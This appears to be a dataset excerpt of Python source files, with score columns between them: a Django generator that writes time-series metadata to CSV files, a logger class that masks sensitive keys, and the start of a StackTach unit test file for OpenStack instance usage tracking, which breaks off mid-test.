"""Inicializa en un diccionario con IDs de series como clave los valores a escribir en cada
uno de los CSV.
"""
fields = SeriesRepository.get_available_series().exclude(identifier=None)
if self.catalog:
try:
catalog = Catalog.objects.get(identifier=self.catalog)
except Catalog.DoesNotExist:
return
fields = fields.filter(
distribution__dataset__catalog=catalog
)
fields = fields.prefetch_related(
'distribution',
'distribution__dataset',
'distribution__dataset__catalog',
'enhanced_meta',
)
all_meta = Metadata.objects.all()
field_ct = ContentType.objects.get_for_model(Field)
for field in fields:
meta = json.loads(field.metadata)
dist_meta = json.loads(field.distribution.metadata)
dataset_meta = json.loads(field.distribution.dataset.metadata)
themes = field.distribution.dataset.themes
theme_labels = get_theme_labels(json.loads(themes)) if themes else ''
self.fields[field.identifier] = {
'dataset': field.distribution.dataset,
'distribution': field.distribution,
'serie': field,
'serie_titulo': field.title,
'serie_unidades': meta.get('units'),
'serie_descripcion': meta.get('description'),
'distribucion_titulo': dist_meta.get('title'),
'distribucion_descripcion': dist_meta.get('description'),
'distribucion_url_descarga': field.distribution.download_url,
'dataset_responsable': dataset_meta.get('publisher', {}).get('name'),
'dataset_fuente': dataset_meta.get('source'),
'dataset_titulo': field.distribution.dataset.title,
'dataset_descripcion': dataset_meta.get('description'),
'dataset_tema': theme_labels,
'metadata': {o.key: o.value for o in list(all_meta.filter(content_type=field_ct, object_id=field.id))},
'frequency': self.serie_periodicity(field),
}
def serie_periodicity(self, field):
return meta_keys.get(field, meta_keys.PERIODICITY) or meta_keys.get(field.distribution, meta_keys.PERIODICITY)
def generate(self):
if not self.fields:
GenerateDumpTask.info(self.task, f"No hay series cargadas para el catálogo {self.catalog}")
return
FullCsvGenerator(self.task, self.fields, self.catalog).generate()
ValuesCsvGenerator(self.task, self.fields, self.catalog).generate()
SourcesCsvGenerator(self.task, self.fields, self.catalog).generate()
MetadataCsvGenerator(self.task, self.fields, self.catalog).generate()
def get_theme_labels(themes: list):
"""Devuelve un string con los labels de themes del dataset separados por comas"""
labels = []
for theme in themes:
labels.append(theme['label'])
return ','.join(labels) | series_tiempo_ar_api/apps/dump/generator/generator.py | import os
import json
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django_datajsonar.models import Field, Catalog, Metadata
from series_tiempo_ar_api.apps.dump.generator.metadata import MetadataCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.sources import SourcesCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.values_csv import ValuesCsvGenerator
from series_tiempo_ar_api.apps.management import meta_keys
from series_tiempo_ar_api.apps.dump.models import GenerateDumpTask
from series_tiempo_ar_api.libs.datajsonar_repositories.series_repository import SeriesRepository
from .full_csv import FullCsvGenerator
class DumpGenerator:
dump_dir = os.path.join(settings.MEDIA_ROOT, 'dump')
def __init__(self, task: GenerateDumpTask, catalog: str = None):
self.fields = {}
self.themes = {}
self.task = task
self.catalog = catalog
self.init_data()
if not os.path.exists(self.dump_dir):
os.makedirs(self.dump_dir)
def init_data(self):
"""Inicializa en un diccionario con IDs de series como clave los valores a escribir en cada
uno de los CSV.
"""
fields = SeriesRepository.get_available_series().exclude(identifier=None)
if self.catalog:
try:
catalog = Catalog.objects.get(identifier=self.catalog)
except Catalog.DoesNotExist:
return
fields = fields.filter(
distribution__dataset__catalog=catalog
)
fields = fields.prefetch_related(
'distribution',
'distribution__dataset',
'distribution__dataset__catalog',
'enhanced_meta',
)
all_meta = Metadata.objects.all()
field_ct = ContentType.objects.get_for_model(Field)
for field in fields:
meta = json.loads(field.metadata)
dist_meta = json.loads(field.distribution.metadata)
dataset_meta = json.loads(field.distribution.dataset.metadata)
themes = field.distribution.dataset.themes
theme_labels = get_theme_labels(json.loads(themes)) if themes else ''
self.fields[field.identifier] = {
'dataset': field.distribution.dataset,
'distribution': field.distribution,
'serie': field,
'serie_titulo': field.title,
'serie_unidades': meta.get('units'),
'serie_descripcion': meta.get('description'),
'distribucion_titulo': dist_meta.get('title'),
'distribucion_descripcion': dist_meta.get('description'),
'distribucion_url_descarga': field.distribution.download_url,
'dataset_responsable': dataset_meta.get('publisher', {}).get('name'),
'dataset_fuente': dataset_meta.get('source'),
'dataset_titulo': field.distribution.dataset.title,
'dataset_descripcion': dataset_meta.get('description'),
'dataset_tema': theme_labels,
'metadata': {o.key: o.value for o in list(all_meta.filter(content_type=field_ct, object_id=field.id))},
'frequency': self.serie_periodicity(field),
}
def serie_periodicity(self, field):
return meta_keys.get(field, meta_keys.PERIODICITY) or meta_keys.get(field.distribution, meta_keys.PERIODICITY)
def generate(self):
if not self.fields:
GenerateDumpTask.info(self.task, f"No hay series cargadas para el catálogo {self.catalog}")
return
FullCsvGenerator(self.task, self.fields, self.catalog).generate()
ValuesCsvGenerator(self.task, self.fields, self.catalog).generate()
SourcesCsvGenerator(self.task, self.fields, self.catalog).generate()
MetadataCsvGenerator(self.task, self.fields, self.catalog).generate()
def get_theme_labels(themes: list):
"""Devuelve un string con los labels de themes del dataset separados por comas"""
labels = []
for theme in themes:
labels.append(theme['label'])
return ','.join(labels) | 0.437103 | 0.155335 |
import logging
from bse import defaults
from bse.transform import Jsonable
from typing import Any, Dict, List
class BSELogger(logging.getLoggerClass()): # type: ignore
def _context(self, kwargs: Dict[str, Any]) -> None:
kwargs["extra"] = kwargs.get("extra", {})
kwargs["extra"]["context"] = kwargs["extra"].get("context", "")
def _tryjsonify(self, msg: Any) -> Any:
if isinstance(msg, dict):
# make a copy to mask values
msg = dict(msg)
for k in defaults.MASK_KEYS:
v = msg.get(k)
if v and isinstance(v, str):
msg[k] = "*" * len(v)
try:
msg = Jsonable.dump(msg)
except Exception:
pass
elif isinstance(msg, list) or isinstance(msg, Jsonable):
try:
msg = Jsonable.dump(msg)
except Exception:
pass
return msg
def info(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().info(msg, *args, **kwargs)
def warning(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().warning(msg, *args, **kwargs)
def error(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().error(msg, *args, **kwargs)
def critical(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().critical(msg, *args, **kwargs)
def exception(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().exception(msg, *args, **kwargs)
def debug(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().debug(msg, *args, **kwargs)
logging.setLoggerClass(BSELogger)
Logger = logging.Logger
def new(name: str) -> Logger:
# Create a custom logger
logger = logging.getLogger(name)
log_format = logging.Formatter(
"%(asctime)s [%(levelname)s] %(name)s%(context)s - %(message)s"
)
log_level = logging.DEBUG
logger.setLevel(log_level)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
handler.setLevel(log_level)
handler.setFormatter(log_format)
break
else:
c_handler = logging.FileHandler(filename=defaults.LOG)
c_handler.setLevel(log_level)
c_handler.setFormatter(log_format)
logger.addHandler(c_handler)
return logger | bse/logger.py |
import logging
from bse import defaults
from bse.transform import Jsonable
from typing import Any, Dict, List
class BSELogger(logging.getLoggerClass()): # type: ignore
def _context(self, kwargs: Dict[str, Any]) -> None:
kwargs["extra"] = kwargs.get("extra", {})
kwargs["extra"]["context"] = kwargs["extra"].get("context", "")
def _tryjsonify(self, msg: Any) -> Any:
if isinstance(msg, dict):
# make a copy to mask values
msg = dict(msg)
for k in defaults.MASK_KEYS:
v = msg.get(k)
if v and isinstance(v, str):
msg[k] = "*" * len(v)
try:
msg = Jsonable.dump(msg)
except Exception:
pass
elif isinstance(msg, list) or isinstance(msg, Jsonable):
try:
msg = Jsonable.dump(msg)
except Exception:
pass
return msg
def info(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().info(msg, *args, **kwargs)
def warning(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().warning(msg, *args, **kwargs)
def error(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().error(msg, *args, **kwargs)
def critical(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().critical(msg, *args, **kwargs)
def exception(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().exception(msg, *args, **kwargs)
def debug(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().debug(msg, *args, **kwargs)
logging.setLoggerClass(BSELogger)
Logger = logging.Logger
def new(name: str) -> Logger:
# Create a custom logger
logger = logging.getLogger(name)
log_format = logging.Formatter(
"%(asctime)s [%(levelname)s] %(name)s%(context)s - %(message)s"
)
log_level = logging.DEBUG
logger.setLevel(log_level)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
handler.setLevel(log_level)
handler.setFormatter(log_format)
break
else:
c_handler = logging.FileHandler(filename=defaults.LOG)
c_handler.setLevel(log_level)
c_handler.setFormatter(log_format)
logger.addHandler(c_handler)
return logger | 0.638497 | 0.08733 |
import datetime
import json
import mox
import utils
from utils import BANDWIDTH_PUBLIC_OUTBOUND
from utils import INSTANCE_FLAVOR_ID_1
from utils import INSTANCE_FLAVOR_ID_2
from utils import INSTANCE_ID_1
from utils import OS_VERSION_1
from utils import OS_ARCH_1
from utils import OS_DISTRO_1
from utils import RAX_OPTIONS_1
from utils import MESSAGE_ID_1
from utils import REQUEST_ID_1
from utils import TENANT_ID_1
from utils import INSTANCE_TYPE_ID_1
from utils import DUMMY_TIME
from utils import INSTANCE_TYPE_ID_2
from stacktach import stacklog, models
from stacktach import notification
from stacktach import views
from tests.unit import StacktachBaseTestCase
class StacktachRawParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def assertOnHandlerResponse(self, resp, **kwargs):
for key in kwargs:
self.assertTrue(key in resp, msg='%s not in response' % key)
self.assertEqual(resp[key], kwargs[key])
def test_process_raw_data(self):
deployment = self.mox.CreateMockAnything()
when = '2013-1-25 13:38:23.123'
dict = {
'timestamp': when,
}
routing_key = 'monitor.info'
args = (routing_key, dict)
json_args = json.dumps(args)
mock_record = self.mox.CreateMockAnything()
mock_notification = self.mox.CreateMockAnything()
mock_notification.save().AndReturn(mock_record)
self.mox.StubOutWithMock(notification, 'notification_factory')
exchange = 'nova'
notification.notification_factory(dict, deployment, routing_key,
json_args, exchange).AndReturn(
mock_notification)
self.mox.ReplayAll()
self.assertEquals(
views.process_raw_data(deployment, args, json_args, exchange),
(mock_record, mock_notification))
self.mox.VerifyAll()
def test_process_raw_data_old_timestamp(self):
deployment = self.mox.CreateMockAnything()
when = '2013-1-25T13:38:23.123'
dict = {
'_context_timestamp': when,
}
routing_key = 'monitor.info'
args = ('monitor.info', dict)
json_args = json.dumps(args[1])
mock_notification = self.mox.CreateMockAnything()
mock_notification.save()
self.mox.StubOutWithMock(notification, 'notification_factory')
exchange = 'nova'
notification.notification_factory(dict, deployment, routing_key,
json_args, exchange).AndReturn(mock_notification)
self.mox.ReplayAll()
views.process_raw_data(deployment, args, json_args, exchange)
self.mox.VerifyAll()
class StacktachLifecycleTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def test_start_kpi_tracking_not_update(self):
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.start'
self.mox.ReplayAll()
views.start_kpi_tracking(None, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking_not_from_api(self):
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.update'
raw.service = 'compute'
self.mox.ReplayAll()
views.start_kpi_tracking(None, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking(self):
lifecycle = self.mox.CreateMockAnything()
tracker = self.mox.CreateMockAnything()
when = utils.decimal_utc()
raw = utils.create_raw(self.mox, when, 'compute.instance.update',
host='nova.example.com', service='api')
views.STACKDB.create_request_tracker(lifecycle=lifecycle,
request_id=REQUEST_ID_1,
start=when,
last_timing=None,
duration=str(0.0))\
.AndReturn(tracker)
views.STACKDB.save(tracker)
self.mox.ReplayAll()
views.start_kpi_tracking(lifecycle, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking_not_using_host(self):
lifecycle = self.mox.CreateMockAnything()
tracker = self.mox.CreateMockAnything()
when = utils.decimal_utc()
raw = utils.create_raw(self.mox, when, 'compute.instance.update',
host='api.example.com', service='compute')
self.mox.ReplayAll()
views.start_kpi_tracking(lifecycle, raw)
self.mox.VerifyAll()
def test_update_kpi_no_trackers(self):
raw = self.mox.CreateMockAnything()
raw.request_id = REQUEST_ID_1
views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
.AndReturn([])
self.mox.ReplayAll()
views.update_kpi(None, raw)
self.mox.VerifyAll()
def test_update_kpi(self):
lifecycle = self.mox.CreateMockAnything()
end = utils.decimal_utc()
raw = self.mox.CreateMockAnything()
raw.request_id = REQUEST_ID_1
raw.when=end
timing = utils.create_timing(self.mox, 'compute.instance.create',
lifecycle, end_when=end)
start = utils.decimal_utc()
tracker = utils.create_tracker(self.mox, REQUEST_ID_1, lifecycle,
start)
views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
.AndReturn([tracker])
views.STACKDB.save(tracker)
self.mox.ReplayAll()
views.update_kpi(timing, raw)
self.assertEqual(tracker.request_id, REQUEST_ID_1)
self.assertEqual(tracker.lifecycle, lifecycle)
self.assertEqual(tracker.last_timing, timing)
self.assertEqual(tracker.start, start)
self.assertEqual(tracker.duration, end-start)
self.mox.VerifyAll()
def test_aggregate_lifecycle_no_instance(self):
raw = self.mox.CreateMockAnything()
raw.instance = None
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.mox.VerifyAll()
def test_aggregate_lifecycle_start(self):
event_name = 'compute.instance.create'
event = '%s.start' % event_name
when = datetime.datetime.utcnow()
raw = utils.create_raw(self.mox, when, event, state='building')
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
lifecycle = self.mox.CreateMockAnything()
lifecycle.instance = INSTANCE_ID_1
views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1)\
.AndReturn(lifecycle)
views.STACKDB.save(lifecycle)
views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
.AndReturn([])
timing = utils.create_timing(self.mox, event_name, lifecycle)
views.STACKDB.create_timing(lifecycle=lifecycle, name=event_name)\
.AndReturn(timing)
views.STACKDB.save(timing)
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.assertEqual(lifecycle.last_raw, raw)
self.assertEqual(lifecycle.last_state, 'building')
self.assertEqual(lifecycle.last_task_state, '')
self.assertEqual(timing.name, event_name)
self.assertEqual(timing.lifecycle, lifecycle)
self.assertEqual(timing.start_raw, raw)
self.assertEqual(timing.start_when, when)
self.mox.VerifyAll()
def test_aggregate_lifecycle_end(self):
event_name = 'compute.instance.create'
start_event = '%s.end' % event_name
end_event = '%s.end' % event_name
start_when = datetime.datetime.utcnow()
end_when = datetime.datetime.utcnow()
start_raw = utils.create_raw(self.mox, start_when, start_event,
state='building')
end_raw = utils.create_raw(self.mox, end_when, end_event,
old_task='build')
lifecycle = utils.create_lifecycle(self.mox, INSTANCE_ID_1,
'active', '', start_raw)
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1)\
.AndReturn([lifecycle])
views.STACKDB.save(lifecycle)
timing = utils.create_timing(self.mox, event_name, lifecycle,
start_raw=start_raw,
start_when=start_when)
views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
.AndReturn([timing])
self.mox.StubOutWithMock(views, "update_kpi")
views.update_kpi(timing, end_raw)
views.STACKDB.save(timing)
self.mox.ReplayAll()
views.aggregate_lifecycle(end_raw)
self.assertEqual(lifecycle.last_raw, end_raw)
self.assertEqual(lifecycle.last_state, 'active')
self.assertEqual(lifecycle.last_task_state, 'build')
self.assertEqual(timing.name, event_name)
self.assertEqual(timing.lifecycle, lifecycle)
self.assertEqual(timing.start_raw, start_raw)
self.assertEqual(timing.start_when, start_when)
self.assertEqual(timing.end_raw, end_raw)
self.assertEqual(timing.end_when, end_when)
self.assertEqual(timing.diff, end_when-start_when)
self.mox.VerifyAll()
def test_aggregate_lifecycle_update(self):
event = 'compute.instance.update'
when = datetime.datetime.utcnow()
raw = utils.create_raw(self.mox, when, event, old_task='reboot')
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
lifecycle = self.mox.CreateMockAnything()
lifecycle.instance = INSTANCE_ID_1
views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1).AndReturn(lifecycle)
views.STACKDB.save(lifecycle)
self.mox.StubOutWithMock(views, "start_kpi_tracking")
views.start_kpi_tracking(lifecycle, raw)
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.assertEqual(lifecycle.last_raw, raw)
self.assertEqual(lifecycle.last_state, 'active')
self.assertEqual(lifecycle.last_task_state, 'reboot')
self.mox.VerifyAll()
class StacktachUsageParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
self.log = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(stacklog, 'get_logger')
def tearDown(self):
self.mox.UnsetStubs()
def setup_mock_log(self, name=None):
if name is None:
stacklog.get_logger(name=mox.IgnoreArg(),
is_parent=False).AndReturn(self.log)
else:
stacklog.get_logger(name=name,
is_parent=False).AndReturn(self.log)
def test_all_instance_events_have_mapping(self):
for key, value in views.INSTANCE_EVENT.items():
msg = "'%s' does not have a process function mapping." % value
self.assertTrue(value in views.USAGE_PROCESS_MAPPING, msg)
def _create_mock_notification(self):
notification = self.mox.CreateMockAnything()
notification.launched_at = str(DUMMY_TIME)
notification.tenant = TENANT_ID_1
notification.rax_options = RAX_OPTIONS_1
notification.os_architecture = OS_ARCH_1
notification.os_version = OS_VERSION_1
notification.os_distro = OS_DISTRO_1
notification.instance = INSTANCE_ID_1
notification.request_id = REQUEST_ID_1
notification.instance_type_id = INSTANCE_TYPE_ID_1
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
return notification
def test_process_usage_for_new_launch_create_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
usage.launched_at = None
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_revert_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_rescue_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end_success_message(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end_error_message(self):
notification = self.mox.CreateMockAnything()
notification.message = 'Error'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.mox.VerifyAll()
def test_process_usage_for_updates_revert_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
